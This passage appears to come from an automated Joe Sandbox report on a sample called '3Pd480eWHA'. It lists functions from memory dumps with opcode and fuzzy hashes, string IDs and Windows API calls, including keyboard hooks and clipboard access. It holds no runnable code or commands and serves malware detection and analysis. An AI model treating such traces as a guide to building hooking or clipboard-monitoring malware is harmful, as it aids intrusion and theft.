                                                                                              • Instruction ID: c4f897ae662e90fc7c7c8ff8dc8e6be2313302bc2f24955291eefe90df307e83
                                                                                              • Opcode Fuzzy Hash: 1a34b6161bbe0e53b80d5c9bbb580be22ed025ea310d47284334ab0897ba9b28
                                                                                              • Instruction Fuzzy Hash: E4314D35E10609DBDB09CFB5C854A9EB7F6BF89310F10851AE906EB350DB71AC46CB41
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @1]5$@1]5
                                                                                              • API String ID: 0-3021202247
                                                                                              • Opcode ID: c2287243f817049a7a23635e5b203c7c8b709864a0c97e3230faf96876eed406
                                                                                              • Instruction ID: 95d9cf2c27f4f87d7b770ed97df3fb25051f9ddfbdfbbd5c06a56e32f64c9606
                                                                                              • Opcode Fuzzy Hash: c2287243f817049a7a23635e5b203c7c8b709864a0c97e3230faf96876eed406
                                                                                              • Instruction Fuzzy Hash: 8E315035E0020A9BDB09CFA4D8957DEFBB2BF49300F50C629E405EB255EB70AD868B51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @1]5$@1]5
                                                                                              • API String ID: 0-3021202247
                                                                                              • Opcode ID: 5254e3919f97d8d05afcc8e5b5586b95ffaf9f8270317177fde69e32ebc07355
                                                                                              • Instruction ID: bae2664945c03d4cc834fbc03c6706c749946b06efb48f5a5f18a3482921b128
                                                                                              • Opcode Fuzzy Hash: 5254e3919f97d8d05afcc8e5b5586b95ffaf9f8270317177fde69e32ebc07355
                                                                                              • Instruction Fuzzy Hash: 38215331E002099BDB09CFA5D8546DEFBB2FF89300F50C625E405EB240DB71AC86CB51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: D0]5$D0]5
                                                                                              • API String ID: 0-2884980661
                                                                                              • Opcode ID: 1e096f6864d56262d443f7e008dc25b9359134a49ee963d81b30781bc18a916a
                                                                                              • Instruction ID: ce521ca5801216a0f2d7856933a60073ef1fd9b9bb9f7ec8b1f2c09084f8f985
                                                                                              • Opcode Fuzzy Hash: 1e096f6864d56262d443f7e008dc25b9359134a49ee963d81b30781bc18a916a
                                                                                              • Instruction Fuzzy Hash: B8214F31E042159BCB19CFA4D4506DEBBB2AF89310F21852AF815FB290EB70AD868B41
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: D0]5$D0]5
                                                                                              • API String ID: 0-2884980661
                                                                                              • Opcode ID: 80ca53e63859f9363191caeab473ed4794ff67c04380576ada07332239dcb0c8
                                                                                              • Instruction ID: f8cb5d0774ef230141388cb355b22cbc76ce99b30c97718ce73141fef5190bcf
                                                                                              • Opcode Fuzzy Hash: 80ca53e63859f9363191caeab473ed4794ff67c04380576ada07332239dcb0c8
                                                                                              • Instruction Fuzzy Hash: 3E213231E006159BCB1DCF64D4506DEFBB2AF49310F60852AF815F7340DB70AD858B51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: `Qq$`Qq
                                                                                              • API String ID: 0-3032102428
                                                                                              • Opcode ID: f36e0a3fe0a7f32cedaa13b76f9a4a95a1e26a88d7552ed1141a10668050fea5
                                                                                              • Instruction ID: 96829809a9357c8e34098e3012e707cca4c4aa3767f0787f496776f1d373fc97
                                                                                              • Opcode Fuzzy Hash: f36e0a3fe0a7f32cedaa13b76f9a4a95a1e26a88d7552ed1141a10668050fea5
                                                                                              • Instruction Fuzzy Hash: 7B012170E00308EFDB04EFB5D451B5DBBB2FF84310F609169D905AF295EA716E069B92
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 38EA248A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2525275775.0000000038EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38EA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38ea0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              • Opcode ID: 2f08fd4ed0d485ec641b73aa8c63afb8ff4efa19df0505fa57db1ccb57b8b427
                                                                                              • Instruction ID: 9675084cd49942e3b67ea49b8bba59769901f2c88e0c92a71c345d16a047aed1
                                                                                              • Opcode Fuzzy Hash: 2f08fd4ed0d485ec641b73aa8c63afb8ff4efa19df0505fa57db1ccb57b8b427
                                                                                              • Instruction Fuzzy Hash: 7F41AFB5D00309DFDB14CFAAC880ADEBBB5BF48710F64812AE819AB210DB759945CF90
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 38EA248A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2525275775.0000000038EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38EA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38ea0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              • Opcode ID: 9f14e07d6851686611d8fd4f1fddba753d9308e6cc2743a579d749211ecd21ca
                                                                                              • Instruction ID: 8651b10382c20dec2d444190dd64323142845fc7462f047614e8c697b3f5f4a9
                                                                                              • Opcode Fuzzy Hash: 9f14e07d6851686611d8fd4f1fddba753d9308e6cc2743a579d749211ecd21ca
                                                                                              • Instruction Fuzzy Hash: 0C41CFB5D00349DFDB14CFA9C880ADEBFB1BF48710F64812AE819AB210DB759945CF90
                                                                                              APIs
                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 38EA7029
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2525275775.0000000038EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38EA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38ea0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallProcWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2714655100-0
                                                                                              • Opcode ID: 4c070ccef30aa25d8537d709060849e1c27f6c815a27d02627b421a7d012f83a
                                                                                              • Instruction ID: a1b546ba7445f03ae15988c254b00db77b4ccf21d1f562a7106cfd3e3251d250
                                                                                              • Opcode Fuzzy Hash: 4c070ccef30aa25d8537d709060849e1c27f6c815a27d02627b421a7d012f83a
                                                                                              • Instruction Fuzzy Hash: BE4158B9900309CFDB14CF99C884A9ABBF5FF89314F248459E518AB320D775A941CFA0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2525275775.0000000038EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38EA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38ea0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Clipboard
                                                                                              • String ID:
                                                                                              • API String ID: 220874293-0
                                                                                              • Opcode ID: 2b3ac10ddff750a68482c1e7b2da8ac8f3a17e1df2c90e449fdaf261ccad5ba1
                                                                                              • Instruction ID: 0ccbcad7d85d4724ddab55a9c18633d299c7f6ebcb46001992077dde47b35858
                                                                                              • Opcode Fuzzy Hash: 2b3ac10ddff750a68482c1e7b2da8ac8f3a17e1df2c90e449fdaf261ccad5ba1
                                                                                              • Instruction Fuzzy Hash: 003103B5D01348EFDB14CFA9C984BDDBBF1AF49704F248469E444AB290CBB4A885CF51
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2525275775.0000000038EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38EA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38ea0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Clipboard
                                                                                              • String ID:
                                                                                              • API String ID: 220874293-0
                                                                                              • Opcode ID: c4d65aa2406648ba5e00d5a88f68dabf8740b2e22b197cb0185aaae9db95e1ce
                                                                                              • Instruction ID: a26388bc8182735f1006f1329543aee490cd0f04ad5c5ed38e90f9733fd4bffc
                                                                                              • Opcode Fuzzy Hash: c4d65aa2406648ba5e00d5a88f68dabf8740b2e22b197cb0185aaae9db95e1ce
                                                                                              • Instruction Fuzzy Hash: B83112B1D0130CDFDB14DF99C984BDEBBF1AF49704F208069E444AB290DBB8A845CBA5
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 38EA6157
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2525275775.0000000038EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38EA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38ea0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: ce919c31c9514f3cad9f6352b9c5695c96e76d900aa7c1ff764c5a34eecbcf60
                                                                                              • Instruction ID: 087831d51ab996e1a37cb43d978b8b7694b1930f6bdd95a5265bacb251d3c623
                                                                                              • Opcode Fuzzy Hash: ce919c31c9514f3cad9f6352b9c5695c96e76d900aa7c1ff764c5a34eecbcf60
                                                                                              • Instruction Fuzzy Hash: B521E6B5D00248AFDB10CFAAD985ADEFFF4EB48310F14841AE958A7350D778A940CF61
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 38EA6157
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2525275775.0000000038EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38EA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38ea0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: 358907bc4ed9b71da866d13bd1c5ccdfe2bb6ca233aa368097ae2907d701b187
                                                                                              • Instruction ID: 219eaa55d97ba5c65f621aca48025ab9c654f0bd8d14020e442d4019c3f92566
                                                                                              • Opcode Fuzzy Hash: 358907bc4ed9b71da866d13bd1c5ccdfe2bb6ca233aa368097ae2907d701b187
                                                                                              • Instruction Fuzzy Hash: 6721E6B5D002489FDB10CFAAD980ADEFFF4EB48310F14841AE958A7310D778A940CF61
                                                                                              APIs
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,38EA7275), ref: 38EA72FF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2525275775.0000000038EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38EA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38ea0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherUser
                                                                                              • String ID:
                                                                                              • API String ID: 2492992576-0
                                                                                              • Opcode ID: 2a6cb84dcb5885925c128938404e950eb098cd60c22e155ed3cbaf45142f3484
                                                                                              • Instruction ID: a690263d8a607df989ee5e8e3e70fb3499385d5137097bb4760403229d51db12
                                                                                              • Opcode Fuzzy Hash: 2a6cb84dcb5885925c128938404e950eb098cd60c22e155ed3cbaf45142f3484
                                                                                              • Instruction Fuzzy Hash: EE219DB18043888FCB10DF9AC84879EBFF0EF09314F14809AD494AB252C7796545CFA1
                                                                                              APIs
                                                                                              • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 38EA986B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2525275775.0000000038EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38EA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38ea0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: HookWindows
                                                                                              • String ID:
                                                                                              • API String ID: 2559412058-0
                                                                                              • Opcode ID: 255f0ce1fee34c33faa4f8bc6d5af8d98f2eada733af1ce463fa67a7aaf3851e
                                                                                              • Instruction ID: 10d201af412250f2a774c54195a447e06325810ea42bcee8f3ec5484d07aa669
                                                                                              • Opcode Fuzzy Hash: 255f0ce1fee34c33faa4f8bc6d5af8d98f2eada733af1ce463fa67a7aaf3851e
                                                                                              • Instruction Fuzzy Hash: F321E5B5D002099FDB14DFAAD944BDEFBF5AB88310F108429D469A7250CB78A941CFA1
                                                                                              APIs
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,38EA7275), ref: 38EA72FF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2525275775.0000000038EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38EA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38ea0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherUser
                                                                                              • String ID:
                                                                                              • API String ID: 2492992576-0
                                                                                              • Opcode ID: 544a9cc22ddb325f15091260f1bab841d6a742d9456d09ff74c60cc390ff9047
                                                                                              • Instruction ID: ce543594b1ac08b5e12cbefb5ca9176dd215e0aa2c887bf173c96d9083a3dff4
                                                                                              • Opcode Fuzzy Hash: 544a9cc22ddb325f15091260f1bab841d6a742d9456d09ff74c60cc390ff9047
                                                                                              • Instruction Fuzzy Hash: BC11F5B5C043498FDB20DF9AC845B9EFBF4EB48324F108459D958A7240D779A944CFA5
                                                                                              APIs
                                                                                              • OleInitialize.OLE32(00000000), ref: 38EA7BBD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2525275775.0000000038EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38EA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38ea0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Initialize
                                                                                              • String ID:
                                                                                              • API String ID: 2538663250-0
                                                                                              • Opcode ID: 5f97d35559f7a006362f0fe59056d17af0bee5ed6cb04638c5b58bff90cafda0
                                                                                              • Instruction ID: b145d5bf23f6d0495dbd04920705700b4595068b5acdce95d8d1e84b791e1271
                                                                                              • Opcode Fuzzy Hash: 5f97d35559f7a006362f0fe59056d17af0bee5ed6cb04638c5b58bff90cafda0
                                                                                              • Instruction Fuzzy Hash: 1F1130B5D043088FCB20DFAAC845B9EBBF5EB48320F208469D958A7300C778A940CFA5
                                                                                              APIs
                                                                                              • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 38EA986B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2525275775.0000000038EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38EA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38ea0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: HookWindows
                                                                                              • String ID:
                                                                                              • API String ID: 2559412058-0
                                                                                              • Opcode ID: f9d67da33047167fb89efa55f01cb286bddc4194885270c07c081cb739922b93
                                                                                              • Instruction ID: 1e63680d9708f2230753039ac629c3e5f8af46063564510a7ac931d5ca7fa5a1
                                                                                              • Opcode Fuzzy Hash: f9d67da33047167fb89efa55f01cb286bddc4194885270c07c081cb739922b93
                                                                                              • Instruction Fuzzy Hash: 70014C76D002098FDB14DFA9D8407EEFBF1BF88310F108529D029AB290CB789941CF60
                                                                                              APIs
                                                                                              • OleInitialize.OLE32(00000000), ref: 38EA7BBD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2525275775.0000000038EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38EA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38ea0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Initialize
                                                                                              • String ID:
                                                                                              • API String ID: 2538663250-0
                                                                                              • Opcode ID: 36789f34c9050231d542739e05ea8c038275a13c9d4fc93da2e0de98724a223a
                                                                                              • Instruction ID: a6763341b6271e5182b2abd0f3142cae76ff059c0877387479c77ccff5abc4dd
                                                                                              • Opcode Fuzzy Hash: 36789f34c9050231d542739e05ea8c038275a13c9d4fc93da2e0de98724a223a
                                                                                              • Instruction Fuzzy Hash: 1AF017B69003058FDB20DFA9D845B9ABBF2AF88314F208459D599EB250C778A945CFA1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: \Vzm
                                                                                              • API String ID: 0-779989405
                                                                                              • Opcode ID: 8c5617a2d5c2dfeeecbe5a9bf06cbf4ca0760ffb040a237368c9c5e8ab198f53
                                                                                              • Instruction ID: 0c264ae0b1454df347b7a432f815d7a9b321774928bb74336022368bfe4a135c
                                                                                              • Opcode Fuzzy Hash: 8c5617a2d5c2dfeeecbe5a9bf06cbf4ca0760ffb040a237368c9c5e8ab198f53
                                                                                              • Instruction Fuzzy Hash: 88A16C70E003099FDF28CFA9D9857DEBBF2AF48714F248139E414A7294DB749986CB81
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: LRq
                                                                                              • API String ID: 0-3187445251
                                                                                              • Opcode ID: defe68d496eba563164f7199895cb89d30c68b418efc6b44a8229964fdf3c5a7
                                                                                              • Instruction ID: d7344b7f102d75e2d9204d137eb7c526668e853e84df18b21b46967712aa20b6
                                                                                              • Opcode Fuzzy Hash: defe68d496eba563164f7199895cb89d30c68b418efc6b44a8229964fdf3c5a7
                                                                                              • Instruction Fuzzy Hash: F8515034704215CFDB18DB69C969AAD7BF2AF8D700F2140A9E406EB3A1DB75DC81CB91
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: LRq
                                                                                              • API String ID: 0-3187445251
                                                                                              • Opcode ID: 45b3f68de54ffb3a94640a16347a67f9f6720748d80b86d4116001e5b192a615
                                                                                              • Instruction ID: a7d8f0085ba197d6bb8f8b3629fe0dc283934a195103e2db8d957b5d83fb0fb7
                                                                                              • Opcode Fuzzy Hash: 45b3f68de54ffb3a94640a16347a67f9f6720748d80b86d4116001e5b192a615
                                                                                              • Instruction Fuzzy Hash: FF314F71E152198BDB19CFA8C9507DEB7F2EF85300F60856AE801EB390EB749D828B51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: XPq
                                                                                              • API String ID: 0-1601936878
                                                                                              • Opcode ID: 703614cc3b566c9f866a1c0543b9327e91c810a760f8901d7ffe98dcc113a6ab
                                                                                              • Instruction ID: 2f181b135710049b872e5716166aa7366944cd2c0f7b8ca536253a2a2cd0cc89
                                                                                              • Opcode Fuzzy Hash: 703614cc3b566c9f866a1c0543b9327e91c810a760f8901d7ffe98dcc113a6ab
                                                                                              • Instruction Fuzzy Hash: AA418E75F10208DFEB049FA9C815B9EBBF6BF88300F24852AE105AB395DE759C458F91
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PHq
                                                                                              • API String ID: 0-3820536768
                                                                                              • Opcode ID: aec53e9a7327c405621f5bf50ceb4a9e647492eeb4fefca7bc59798f6d794456
                                                                                              • Instruction ID: 55139e9d1cdebf6d1fb9fefb3c707fc4861599b46486fd27a3b94b617e381c1c
                                                                                              • Opcode Fuzzy Hash: aec53e9a7327c405621f5bf50ceb4a9e647492eeb4fefca7bc59798f6d794456
                                                                                              • Instruction Fuzzy Hash: 6841AD74E00309DFEB14EF75C89469EBBB6FF85384F20492AD405EB240DB72A946CB42
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PHq
                                                                                              • API String ID: 0-3820536768
                                                                                              • Opcode ID: 28cd5470b3bcd291fcb2881cfc1ae99a9e46bd6effa2ed11f6c6f7d1e9e18817
                                                                                              • Instruction ID: 369b52dcb2bc2f43e439d13ff1fcfbba9e5b2d74c445e1deb0468b7237efbbc3
                                                                                              • Opcode Fuzzy Hash: 28cd5470b3bcd291fcb2881cfc1ae99a9e46bd6effa2ed11f6c6f7d1e9e18817
                                                                                              • Instruction Fuzzy Hash: 7431C034B002058FEB19ABB488647AE7BB7AB89340F104569D412DF365DF36DD42CB92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PHq
                                                                                              • API String ID: 0-3820536768
                                                                                              • Opcode ID: 4bf82745f4a75856259671fe4698f1134cd8416fec90220a1da4140d119bd4f4
                                                                                              • Instruction ID: d02b7b446aa395c3e46bdc61fc64915532092d7a02fd9ce2e1e5c9666d6289be
                                                                                              • Opcode Fuzzy Hash: 4bf82745f4a75856259671fe4698f1134cd8416fec90220a1da4140d119bd4f4
                                                                                              • Instruction Fuzzy Hash: 6431BE30B002098FEB18ABB5C8547AE7BB7AB88744F204568D416DF365DF36DC028B96
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: LRq
                                                                                              • API String ID: 0-3187445251
                                                                                              • Opcode ID: d220f7cc59fe53d6f5c42b383b91cec895b840dda3818de0612664d656759da7
                                                                                              • Instruction ID: 97f09bec19573f32a43b318e8fe0707196d0d4dd6be9862b18231d1862bce58d
                                                                                              • Opcode Fuzzy Hash: d220f7cc59fe53d6f5c42b383b91cec895b840dda3818de0612664d656759da7
                                                                                              • Instruction Fuzzy Hash: 8D316031E15209CBDB19CFA8D4507DEB7F2EF85300F208566E801EB390EB70AD828B50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'q
                                                                                              • API String ID: 0-1807707664
                                                                                              • Opcode ID: 51b731f3a342ff802b47378342f3ac861ff34c6e2ad20b20728fd8ecabe0fc6a
                                                                                              • Instruction ID: 1498ae43f0a96edbce0037d10b2d468b7a65657b56a6d26c69c04d80a39fea69
                                                                                              • Opcode Fuzzy Hash: 51b731f3a342ff802b47378342f3ac861ff34c6e2ad20b20728fd8ecabe0fc6a
                                                                                              • Instruction Fuzzy Hash: E7318A316047028BD729EB74D851A9AB7E2BFC0311750897CE05A9F250DF31B94ACBC6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'q
                                                                                              • API String ID: 0-1807707664
                                                                                              • Opcode ID: b7aa1265fb574bc45da286686825821a681425e5411e4b4de26a8589c6e3edf3
                                                                                              • Instruction ID: 35a1048ff7a372d54ca667043a5ecacf6a22704f398ce6d507935bcb3fc7f309
                                                                                              • Opcode Fuzzy Hash: b7aa1265fb574bc45da286686825821a681425e5411e4b4de26a8589c6e3edf3
                                                                                              • Instruction Fuzzy Hash: 8F316931A047018BC729EB78D851A9AB7E2BFC0311710897CE05A8F251DF31B94ACBC6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 8
                                                                                              • API String ID: 0-4194326291
                                                                                              • Opcode ID: d5e2dcf564367e9eaac1cb558f8904d1e14b19cf703a08bf11fe7798eb49a836
                                                                                              • Instruction ID: 71f27b62b55a9b229850ecb9403a2fb1eaadda3aca7fc16dec304663b46ff428
                                                                                              • Opcode Fuzzy Hash: d5e2dcf564367e9eaac1cb558f8904d1e14b19cf703a08bf11fe7798eb49a836
                                                                                              • Instruction Fuzzy Hash: 6D21D330602A429FCB18DF79C580ABA7BE2AF84344B508178C914DB269FB34CA8787C0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: LRq
                                                                                              • API String ID: 0-3187445251
                                                                                              • Opcode ID: bc72965e68f4311de3de6306603cea711896b68dec9cf57f5b6dd8356cae7d0f
                                                                                              • Instruction ID: f13ede0e8acfd04203e553a2178402f283def76989e4f482af912d83ab666335
                                                                                              • Opcode Fuzzy Hash: bc72965e68f4311de3de6306603cea711896b68dec9cf57f5b6dd8356cae7d0f
                                                                                              • Instruction Fuzzy Hash: 5C2107343083809FC716AB3888617997FA1EF86300B1545EFE185CB297EB359D59C7A2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Ko
